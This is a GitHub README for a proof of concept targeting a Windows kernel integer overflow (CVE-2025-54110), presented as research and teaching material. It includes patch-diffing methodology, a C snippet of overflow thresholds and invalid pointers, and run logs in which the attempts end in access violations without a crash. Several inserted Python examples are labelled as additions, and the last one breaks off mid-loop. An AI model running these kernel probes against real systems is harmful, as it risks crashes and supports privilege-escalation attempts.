canomer/CVE-2025-54110-Kernel-EoP-PoC
GitHub: canomer/CVE-2025-54110-Kernel-EoP-PoC
A crash-only PoC for CVE-2025-54110 (an integer overflow in the Windows kernel's NtQueryDirectoryObject), intended for security research and teaching; it demonstrates the patch-diffing methodology and the effectiveness of modern kernel mitigations.
Stars: 11 | Forks: 1
# CVE-2025-54110-Kernel-EoP-PoC
A PoC implementation for CVE-2025-54110, a kernel-level integer overflow vulnerability in the Windows `NtQueryDirectoryObject` system call.
### CVE-2025-54110 - Windows Kernel Integer Overflow Analysis
**CVE:** https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54110
This repository contains a **crash-only PoC** for the CVE-2025-54110 kernel EoP vulnerability, developed solely for **security research, reverse engineering and exploit-development study**. The code is meant to demonstrate vulnerability research techniques, including:
- Binary diffing with Ghidra Version Tracking
- Windows Patch Tuesday analysis
- Kernel vulnerability research methodology
- Structured Exception Handling (SEH) behaviour analysis
This PoC does not achieve privilege escalation or a reliable blue screen (BSOD). It is designed to safely trigger an access violation that is caught by the Windows kernel's protection mechanisms.
## Overview
### CVE-2025-54110: Windows Kernel EoP Vulnerability
**Release date:** September 2025 (Windows Patch Tuesday)
| Attribute | Value |
|----------|-------|
| **CWE** | CWE-190: Integer Overflow or Wraparound |
| **CVSS 3.1 score** | 8.8 (High) / 7.7 (Temporal) |
| **Vector string** | `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C` |
| **Attack vector** | Local |
| **Attack complexity** | Low |
| **Privileges required** | Low |
| **User interaction** | None |
| **Scope** | Changed |
| **Confidentiality** | High |
| **Integrity** | High |
| **Availability** | High |
| **Exploit maturity** | Unproven |
### Executive Summary
An integer overflow in the Windows kernel allows an authenticated attacker to potentially elevate privileges locally. According to Microsoft's advisory:
### Potential Impact
- A successful attacker could gain **SYSTEM privileges**
- Sandbox escape from a restricted user-mode process
- Kernel memory corruption leading to code execution
### Exploitability Assessment
- **Publicly disclosed:** No
- **Exploited in the wild:** No
- **Microsoft assessment:** Exploitation More Likely
## Research Methodology
### 1. Patch Analysis Workflow
```
Windows Update Files from Aug 2025 & Sep 2025 (KB.msu)
↓
Extract CAB Files
↓
Calculate SHA-256 Hashes (August vs September)
↓
Identify Changed Files
↓
Ghidra Version Tracking Analysis
↓
Setting Symbol Servers to Clarify Function Names
↓
Function-Level Diff Comparison
```
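The hashing step of the workflow above, as an added example that is not part of the original repository: it walks two extracted update trees, hashes every file with SHA-256 and reports which files changed, were added or were removed between the two months. The directory names, file names and file contents below are constructed stand-ins for real extracted CAB contents; point `hash_tree` at the real August and September extraction directories to reproduce the step.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_of_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large extracted binaries never sit whole in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root: Path) -> dict:
    """Map each file path (relative to root, POSIX separators) to its SHA-256 digest."""
    digests = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = Path(dirpath) / name
            digests[full.relative_to(root).as_posix()] = sha256_of_file(full)
    return digests


def diff_trees(before: dict, after: dict) -> dict:
    """Classify files as changed, added or removed between two digest maps."""
    common = before.keys() & after.keys()
    return {
        "changed": sorted(p for p in common if before[p] != after[p]),
        "added": sorted(after.keys() - before.keys()),
        "removed": sorted(before.keys() - after.keys()),
    }


def build_sample_trees(base: Path):
    """Constructed sample: two fake extraction trees standing in for the
    August and September update contents."""
    aug = base / "2025-08"
    sep = base / "2025-09"
    for root in (aug, sep):
        (root / "x64").mkdir(parents=True)
    # win32k.sys: identical bytes in both months -> no change expected
    (aug / "x64" / "win32k.sys").write_bytes(b"MZ" + b"A" * 64)
    (sep / "x64" / "win32k.sys").write_bytes(b"MZ" + b"A" * 64)
    # ntoskrnl.exe: one byte differs -> flagged as changed
    (aug / "x64" / "ntoskrnl.exe").write_bytes(b"MZ" + b"B" * 64)
    (sep / "x64" / "ntoskrnl.exe").write_bytes(b"MZ" + b"B" * 63 + b"C")
    # a file present only in the September package
    (sep / "x64" / "new.dll").write_bytes(b"MZ")
    return aug, sep


def run_sample() -> dict:
    """Build the constructed trees in a temp dir and diff them."""
    with tempfile.TemporaryDirectory() as tmp:
        aug, sep = build_sample_trees(Path(tmp))
        return diff_trees(hash_tree(aug), hash_tree(sep))


if __name__ == "__main__":
    for kind, paths in run_sample().items():
        print(f"{kind}:")
        for p in paths:
            print(f"  {p}")
```

Only the `changed` list feeds the next step (loading both versions of each changed binary into Ghidra Version Tracking); `added` and `removed` are reported because a renamed or newly shipped component is just as worth a look as a modified one.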
### 2. Files Analysed
The initial analysis focused on two main kernel components:
#### win32k.sys (-)
- **Result:** No significant changes detected
- **Score range:** 0.97-1.0 (high similarity)
- **Conclusion:** Not the component affected by CVE-2025-54110
#### ntoskrnl.exe (+)
- **Result:** Significant changes in several functions
- **Score range:** Functions with score ≤ 0.951
- **Length differences:** Changes in source vs. destination byte length detected
- **Total items exported:** 2,036 functions for analysis
### 3. Ghidra Version Tracking Results
A sample of the changes identified in `ntoskrnl.exe`:
| Score | Confidence | Source Length | Dest Length | Source Function | Dest Function |
|-------|------------|---------------|-------------|-----------------|---------------|
| 0.951 | 2.618 | 1023 | 365 | FUN_1403146d0 | FUN_1403a4ea0 |
| 0.950 | 2.285 | 113 | 203 | FUN_140680810 | FUN_1406d952c |
| 0.950 | 3.137 | 782 | 1050 | FUN_14032106c | FUN_140303a38 |
| 0.951 | 2.675 | 141 | 171 | FUN_140407bd0 | FUN_140a172a0 |
| 0.951 | 2.660 | 346 | 150 | FUN_140610e60 | FUN_1406115d4 |
## PoC Claims
### Technical Approach
The PoC (`precise_overflow_bsod.c`) attempts to trigger the integer overflow through:
1. **Precise threshold calculation:** `0xfffffdbc` (derived from base=0x20, name=0x200)
2. **The NtQueryDirectoryObject API:** the target function in which the overflow is triggered
3. **Multi-phase strategy:**
   - Phase 1: precise integer overflow attempt
   - Phase 2: kernel memory targeting
   - Phase 3: multi-threaded attempts
### Code Structure
```c
// Key threshold values calculated for overflow
ULONG precise_thresholds[] = {
    0xfffffdbc, // Precise threshold - base=0x20, name=0x200
    0xfffffdbb, // Threshold - 1
    0xfffffdbd, // Threshold + 1
    0xfffffdba, // Threshold - 2
    0xfffffdbe, // Threshold + 2
};
// Buffer configurations to test edge cases
PVOID buffer_types[] = {
    VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE), // Normal buffer
    VirtualAlloc(NULL, 0x10, MEM_COMMIT, PAGE_READWRITE),   // Small buffer
    NULL,                                                   // NULL pointer
    (PVOID)0x4141414141414141,                              // Invalid pointer
    (PVOID)0x0000000000000000,                              // Zero address
};
```
### Exploit Vectors Tested
```
NtQueryDirectoryObject() Parameters:
├── DirectoryHandle: \BaseNamedObjects, \KernelObjects, etc.
├── Buffer: Various pointer configurations
├── BufferLength: Calculated overflow thresholds (0xfffffdbc variants)
├── ReturnSingleEntry: TRUE/FALSE variations
├── RestartScan: TRUE/FALSE variations
└── Context: Controlled iteration state
```
## Why the PoC Does Not Crash the System
### Actual Result
The PoC consistently returns `STATUS_ACCESS_VIOLATION (0xC0000005)` without causing a blue screen (BSOD). This is **by design**, and it demonstrates several key Windows kernel safety mechanisms:
### 1. Structured Exception Handling (SEH)
```
User-Mode Input → NtQueryDirectoryObject
↓
ProbeForRead/Write
↓
__try { ... }
↓
Access Violation Detected
↓
__except { ... }
↓
Return STATUS_ACCESS_VIOLATION
```
**Why it works:**
- Windows kernel system calls wrap user-mode pointer accesses in exception handlers
- Invalid memory accesses are **caught** rather than allowed to propagate
- The system returns an error code to the caller instead of crashing
### 2. SMAP (Supervisor Mode Access Prevention)
A modern CPU feature that prevents kernel mode (Ring 0) from accessing user-mode (Ring 3) memory without explicit authorization:
```
Kernel attempts to access user pointer
↓
SMAP checks permission (STAC/CLAC instructions)
↓
Unauthorized access detected
↓
CPU generates #PF (Page Fault)
↓
Caught by kernel exception handler
```
**Impact on the PoC:**
- Even if the overflow occurs, direct kernel-to-user memory access is blocked
- Prevents exploitation of pointer-dereference bugs
### 3. KASLR (Kernel Address Space Layout Randomization)
```
Boot Time: Kernel Base = Random Address
↓
Hardcoded PoC address (0xfffffdbc)
↓
Does NOT match actual kernel structures
↓
Write to non-critical memory OR caught by SEH
```
**Why no BSOD occurs:**
- The PoC uses static addresses/thresholds
- Real kernel structures live at randomized locations
- The write misses critical targets (e.g. EPROCESS, pool headers)
### 4. Kernel Pool Integrity Checks
Windows 10+ implements enhanced pool corruption detection:
```
Heap/Pool Allocation
↓
Header Contains:
├── Magic Values
├── Size Information
└── Checksums
↓
On Free/Access:
Validate Integrity
↓
Corruption Detected?
↓
[YES] → Safe Exception → Return Error
[NO] → Proceed Normally
```
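A toy model of the integrity check sketched above, added here and not taken from the repository or from Windows: each allocation gets a header carrying a magic value, a size and a checksum, and `free` validates the header before releasing the block. The header layout, the magic value and the CRC-32 checksum are constructed for the demonstration; the real Windows `POOL_HEADER` differs. The demo shows that an in-bounds write leaves the neighbouring block valid, while an overrun that preserves the magic but alters the size field is still caught by the checksum, which is why a magic value alone is not enough.

```python
import struct
import zlib

# Constructed header layout: magic, payload size, reserved, checksum (4 x uint32).
# Teaching model only, not the real Windows POOL_HEADER.
POOL_MAGIC = 0x4C4F4F50            # constructed tag value
HEADER_FMT = "<IIII"
HEADER_SIZE = struct.calcsize(HEADER_FMT)   # 16 bytes


class PoolCorruption(Exception):
    """Raised when a header fails validation (the 'Corruption Detected? [YES]' branch)."""


class ToyPool:
    """A flat bytearray carved into [header][payload] blocks by a bump allocator."""

    def __init__(self, size: int):
        self.mem = bytearray(size)
        self.next_free = 0
        self.headers = {}           # payload offset -> header offset

    @staticmethod
    def _checksum(magic: int, size: int, reserved: int) -> int:
        return zlib.crc32(struct.pack("<III", magic, size, reserved)) & 0xFFFFFFFF

    def allocate(self, size: int) -> int:
        """Write a fresh header and return the payload offset."""
        hdr = self.next_free
        if hdr + HEADER_SIZE + size > len(self.mem):
            raise MemoryError("pool exhausted")
        struct.pack_into(HEADER_FMT, self.mem, hdr,
                         POOL_MAGIC, size, 0, self._checksum(POOL_MAGIC, size, 0))
        payload = hdr + HEADER_SIZE
        self.headers[payload] = hdr
        self.next_free = payload + size
        return payload

    def validate(self, payload: int) -> int:
        """Check magic, checksum and size plausibility; return the recorded size."""
        hdr = self.headers[payload]
        magic, size, reserved, checksum = struct.unpack_from(HEADER_FMT, self.mem, hdr)
        if magic != POOL_MAGIC:
            raise PoolCorruption("bad magic")
        if checksum != self._checksum(magic, size, reserved):
            raise PoolCorruption("bad checksum")
        if payload + size > len(self.mem):
            raise PoolCorruption("size out of range")
        return size

    def write(self, payload: int, data: bytes) -> None:
        """Deliberately unchecked write, used to simulate a copy that overruns its block."""
        self.mem[payload:payload + len(data)] = data

    def free(self, payload: int) -> None:
        """Validate on free, as in the diagram, then scrub and release the block."""
        size = self.validate(payload)
        hdr = self.headers.pop(payload)
        self.mem[hdr:payload + size] = bytes(HEADER_SIZE + size)


def free_outcome(pool: ToyPool, payload: int) -> str:
    """Translate the validation result into the diagram's two branches."""
    try:
        pool.free(payload)
        return "ok"
    except PoolCorruption as exc:
        return f"corruption: {exc}"


def demo() -> dict:
    """Two adjacent 16-byte blocks; overrun the first into the second's header."""
    pool = ToyPool(256)
    a = pool.allocate(16)
    b = pool.allocate(16)
    pool.write(a, b"A" * 16)                      # in bounds: b's header untouched
    in_bounds = pool.validate(b)                  # still reports 16
    # Overrun by 8 bytes: keep the magic intact but rewrite b's size field,
    # the kind of damage a magic-only check would miss.
    pool.write(a, b"A" * 16 + struct.pack("<II", POOL_MAGIC, 0x7FFFFFFF))
    return {
        "b_size_after_in_bounds_write": in_bounds,
        "b_free_after_overrun": free_outcome(pool, b),
        "a_free": free_outcome(pool, a),          # a's own header is undamaged
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```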
## PoC Execution Output Analysis
### Expected Output
Seeing `STATUS_ACCESS_VIOLATION (0xC0000005)` is enough; this is the normal result.
```
C:\Users\reLab\Desktop\cve>.\poc64.exe
==================================================
CVE-2025-54110 - Kernel Integer Overflow PoC
==================================================
[!] WARNING: This code may crash the system (BSOD).
[?] Do you want to continue? (y/n): y
[>] Targeting directory: \BaseNamedObjects
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \KernelObjects
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \Sessions
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \Windows
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[-] Exploit finished. If the system is still running, the attack may have been mitigated.
C:\Users\reLab\Desktop\cve>
```
### Detailed Experiment
```
C:\Users\reLab\Desktop\cve>.\poc64_verbose11.exe
======================================================
CVE-2025-54110 PRECISION INTEGER OVERFLOW BSOD EXPLOIT
Threshold: 0xfffffdbc (base=0x20, name=0x200)
!!! WARNING: HIGH PROBABILITY OF SYSTEM CRASH !!!
======================================================
[+] Current user: desktop-lfkkhu2\relab
[+] Current PID: 1444
[!] THIS EXPLOIT HAS HIGH CHANCE OF CAUSING BSOD!
[!] Continue? (y/n): y
[+] NT functions initialized successfully
[+] Using precise threshold: 0xfffffdbc
[+] Exploiting all directories with precise threshold...
[+] Precision exploiting: \BaseNamedObjects
[*] Phase 1: Precision overflow
[+] Starting precise integer overflow exploitation...
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=0, restart=0
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=0, restart=1
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=1, restart=0
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=1, restart=1
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=4, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
...
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[*] Phase 2: Kernel memory targeting
[+] Targeting kernel memory with precise threshold...
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[*] Phase 3: Multi-threaded BSOD
[+] Triggering precision BSOD with calculated threshold...
[+] Starting precise integer overflow exploitation...
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
...
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=0, restart=0
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=0, restart=1
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=1, restart=0
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=1, restart=1
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision overflow successful!
[+] Starting multi-threaded precision attack...
```
### Observed Behaviour
```
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBB, status=0xC0000005
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBD, status=0xC0000005
```
**Status code:** `0xC0000005` = `STATUS_ACCESS_VIOLATION`
### What This Means
| Aspect | Interpretation |
|--------|----------------|
| **Vulnerability confirmed** | (+) The code path reached the affected function |
| **Input validation** | (!) The crafted input triggered abnormal behaviour |
| **System stability** | (+) SEH prevented a crash; the system stayed stable |
| **DoS achieved** | (-) No BSOD; exception handling succeeded |
| **EoP achieved** | (-) No privilege escalation; controlled failure |
### Success Criteria by Objective
```
┌─────────────────────────────────────────────────────────┐
│ Objective │ Status │ Explanation │
├─────────────────────────────────────────────────────────┤
│ Vulnerability Research │ + │ Behavior change │
│ │ │ confirmed │
├─────────────────────────────────────────────────────────┤
│ Learning Experience │ + │ Kernel protections │
│ │ │ demonstrated │
├─────────────────────────────────────────────────────────┤
│ Crash (DoS/BSOD) │ - │ SEH prevented crash │
├─────────────────────────────────────────────────────────┤
│ Privilege Escalation │ - │ No code execution │
│ │ │ achieved │
└─────────────────────────────────────────────────────────┘
```
## Educational Value
### What This PoC Demonstrates
#### Achievements
1. **Patch diffing methodology**
   - Comparing pre- and post-patch binaries with Ghidra
   - Identifying modified functions via Version Tracking
   - Analysing score-based similarity metrics
2. **Windows kernel architecture**
   - Understanding the system call flow (`NtQueryDirectoryObject`)
   - Recognising the kernel/user-mode boundary
   - Learning NTAPI internals
3. **Security mechanism behaviour**
   - SEH in action: exceptions caught vs. system crash
   - SMAP blocking unauthorized memory access
   - KASLR defeating static-address exploitation
4. **Vulnerability research process**
   - CVE analysis and information gathering
   - Reverse engineering binary changes
   - Hypothesis testing through controlled exploitation attempts
#### Limitations
1. **Modern kernel protections are effective**
   - Simple overflow attempts are not enough
   - Multiple layers of defence must be bypassed
   - Static analysis alone cannot predict exploitability
2. **The gap between theory and practice**
   - The integer overflow exists (in theory)
   - Practical exploitation would require:
     - An information leak (to disclose kernel addresses)
     - Heap spraying / feng shui
     - A ROP chain or other code-execution primitive
     - Bypassing DEP, CFG, HVCI, etc.
## Functions to Prioritize for Analysis
Based on the characteristics of CVE-2025-54110 (integer overflow → buffer overflow in the kernel), prioritize reviewing the functions in the exported CSV that handle the following:
### High-Priority Categories
```
Integer/Size Calculations:
- Functions with arithmetic operations on buffer sizes
- Length calculation before allocation
- Checked vs. unchecked math operations
Buffer/Memory Operations:
- memcpy, memmove, RtlCopyMemory variants
- ExAllocatePool* family
- Buffer size validation routines
Object Directory Handling:
- NtQueryDirectoryObject and related helpers
- ObpLookupDirectoryEntry
- Object enumeration functions
User-Mode Interface:
- ProbeForRead/Write wrappers
- Input validation functions
- IOCTL handlers
```
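The "checked vs. unchecked math operations" item above is the heart of a CWE-190 bug, so here is an added Python example (not the project's code, and not the length computation inside `NtQueryDirectoryObject`) that models a hypothetical per-entry length calculation in wrapping 32-bit arithmetic beside the same calculation with explicit overflow checks. The helper names, the entry counts and the buffer length are assumptions made for the demonstration; the per-entry sizes 0x20 and 0x200 are the base/name values the README quotes. `fits_in_buffer` shows why the wrap matters: a wrapped total passes the caller's bounds check, so the copy that follows runs past the end of the buffer.

```python
# Model of 32-bit unsigned (ULONG) arithmetic. Added illustration only; this is
# not how any Windows routine computes its lengths.
ULONG_MAX = 0xFFFFFFFF
ULONG_MODULUS = ULONG_MAX + 1


def ulong_add(a: int, b: int) -> int:
    """Unsigned 32-bit addition: wraps silently, as C ULONG arithmetic does."""
    return (a + b) % ULONG_MODULUS


def ulong_mul(a: int, b: int) -> int:
    """Unsigned 32-bit multiplication: wraps silently."""
    return (a * b) % ULONG_MODULUS


def required_length_unchecked(entry_count: int, entry_header: int, name_bytes: int) -> int:
    """Vulnerable pattern (hypothetical helper): bytes needed for entry_count
    entries, each a fixed header plus a name, computed in wrapping arithmetic."""
    per_entry = ulong_add(entry_header, name_bytes)
    return ulong_mul(entry_count, per_entry)


def required_length_checked(entry_count: int, entry_header: int, name_bytes: int):
    """Hardened pattern: the same computation, but every step is compared against
    ULONG_MAX and the function fails closed (returns None) instead of wrapping,
    in the spirit of RtlULongAdd / RtlULongMult style helpers."""
    per_entry = entry_header + name_bytes
    if per_entry > ULONG_MAX:
        return None
    total = entry_count * per_entry
    if total > ULONG_MAX:
        return None
    return total


def fits_in_buffer(buffer_length: int, required) -> bool:
    """The bounds check a caller makes before copying. It is only as good as the
    `required` value it is handed: a wrapped value passes, a refused (None) value
    does not."""
    return required is not None and required <= buffer_length


# The README quotes base=0x20 and name=0x200 as per-entry sizes; the entry
# counts and the buffer length are constructed for the demonstration.
HEADER, NAME = 0x20, 0x200
SMALL_COUNT = 3
HUGE_COUNT = 0x800000          # 0x800000 * 0x220 = 0x1_1000_0000, more than 32 bits
BUFFER_LEN = 0x20000000        # a 512 MiB buffer offered by the caller


def demo() -> dict:
    """Compare both computations on a sane and on an overflowing entry count."""
    return {
        "small_unchecked": required_length_unchecked(SMALL_COUNT, HEADER, NAME),
        "small_checked": required_length_checked(SMALL_COUNT, HEADER, NAME),
        "huge_unchecked": required_length_unchecked(HUGE_COUNT, HEADER, NAME),
        "huge_checked": required_length_checked(HUGE_COUNT, HEADER, NAME),
    }


if __name__ == "__main__":
    results = demo()
    for key, value in results.items():
        print(f"{key:16s} {'None' if value is None else hex(value)}")
    # The wrapped total (0x10000000) looks like it fits; the checked path refuses.
    print("unchecked fits:", fits_in_buffer(BUFFER_LEN, results["huge_unchecked"]))
    print("checked fits:  ", fits_in_buffer(BUFFER_LEN, results["huge_checked"]))
```

When reviewing candidate functions from the CSV, the unchecked shape (an add or multiply on a caller-controlled count or length that flows straight into an allocation or a bounds comparison) is the pattern to look for; the fix in the September binary would be expected to introduce the comparison-before-use shape of the checked version.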
### Filtering Strategy for the 2,036 Functions
**Step 1: Score-based filtering**
```
Score ≤ 0.951 AND (SourceLen ≠ DestLen)
```
**Step 2: Keyword search**
```
Function names containing:
- "Directory", "Object", "Query"
- "Buffer", "Length", "Size"
- "Allocate", "Copy", "Validate"
- "Integer", "Overflow", "Wrap"
```
**Step 3: Cross-reference analysis**
```
Functions called by NtQueryDirectoryObject:
ObQueryNameString
ObpEnumerateDirectory
[Related helper functions]
```
**Step 4: Magnitude of change**
```
Prioritize functions with:
- Length difference > 100 bytes
- Confidence score 2.0-3.5 (moderate changes)
```
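The four-step filter above, as an added Python example that is not part of the repository. It reads a Version Tracking export as CSV: the first five rows reuse the score, confidence and length values from the table in section 3, the remaining rows and every function name of the form `Sample_*` are constructed placeholders, the column names are assumed, and the callee list used for step 3 is a constructed stand-in for the cross-reference data Ghidra's call graph would supply. Step 1 is applied as a hard filter; the other three steps are scored as signals and used to rank what survives.

```python
import csv
import io

# Thresholds from the README's filtering strategy.
SCORE_MAX = 0.951
MIN_LEN_DIFF = 100
CONF_RANGE = (2.0, 3.5)
KEYWORDS = ("Directory", "Object", "Query", "Buffer", "Length", "Size",
            "Allocate", "Copy", "Validate", "Integer", "Overflow", "Wrap")

# Constructed stand-in for step 3: names Ghidra's call graph would list as
# reachable from the syscall under study. Not real cross-reference data.
TARGET_CALLEES = {"Sample_QueryDirectoryHelper"}

# Constructed sample export (column names assumed). The first five rows carry the
# numbers from the README's Version Tracking table; the last three rows and all
# Sample_* names are placeholders added to exercise the keyword and xref steps.
SAMPLE_CSV = """score,confidence,source_len,dest_len,source_name,dest_name
0.951,2.618,1023,365,FUN_1403146d0,FUN_1403a4ea0
0.950,2.285,113,203,FUN_140680810,FUN_1406d952c
0.950,3.137,782,1050,FUN_14032106c,FUN_140303a38
0.951,2.675,141,171,FUN_140407bd0,FUN_140a172a0
0.951,2.660,346,150,FUN_140610e60,FUN_1406115d4
0.990,4.100,400,400,Sample_ValidateBufferSize,Sample_ValidateBufferSize
0.940,2.900,512,700,Sample_QueryDirectoryHelper,Sample_QueryDirectoryHelper
0.930,1.200,90,160,Sample_UnrelatedRoutine,Sample_UnrelatedRoutine
"""


def load_rows(text: str) -> list:
    """Parse the CSV export into typed dicts."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({
            "score": float(r["score"]),
            "confidence": float(r["confidence"]),
            "source_len": int(r["source_len"]),
            "dest_len": int(r["dest_len"]),
            "source_name": r["source_name"],
            "dest_name": r["dest_name"],
        })
    return rows


def passes_score_filter(r: dict) -> bool:
    """Step 1: Score <= 0.951 AND SourceLen != DestLen."""
    return r["score"] <= SCORE_MAX and r["source_len"] != r["dest_len"]


def has_keyword(r: dict) -> bool:
    """Step 2: any interesting substring in either function name."""
    names = (r["source_name"] + " " + r["dest_name"]).lower()
    return any(k.lower() in names for k in KEYWORDS)


def is_target_callee(r: dict) -> bool:
    """Step 3: the function appears in the (constructed) callee list."""
    return r["source_name"] in TARGET_CALLEES or r["dest_name"] in TARGET_CALLEES


def is_large_change(r: dict) -> bool:
    """Step 4: length difference > 100 bytes with moderate confidence (2.0-3.5)."""
    lo, hi = CONF_RANGE
    return abs(r["source_len"] - r["dest_len"]) > MIN_LEN_DIFF and lo <= r["confidence"] <= hi


def step1_score_filter(rows: list) -> list:
    return [r for r in rows if passes_score_filter(r)]


def step4_change_magnitude(rows: list) -> list:
    return [r for r in rows if is_large_change(r)]


def prioritize(rows: list) -> list:
    """Hard-filter on step 1, then rank survivors by the number of remaining
    signals they carry, breaking ties by absolute length difference."""
    ranked = []
    for r in step1_score_filter(rows):
        signals = int(has_keyword(r)) + int(is_target_callee(r)) + int(is_large_change(r))
        ranked.append((signals, abs(r["source_len"] - r["dest_len"]), r["source_name"]))
    ranked.sort(reverse=True)
    return [name for _, _, name in ranked]


if __name__ == "__main__":
    rows = load_rows(SAMPLE_CSV)
    print(f"{len(step1_score_filter(rows))} of {len(rows)} rows pass the score filter")
    for i, name in enumerate(prioritize(rows), 1):
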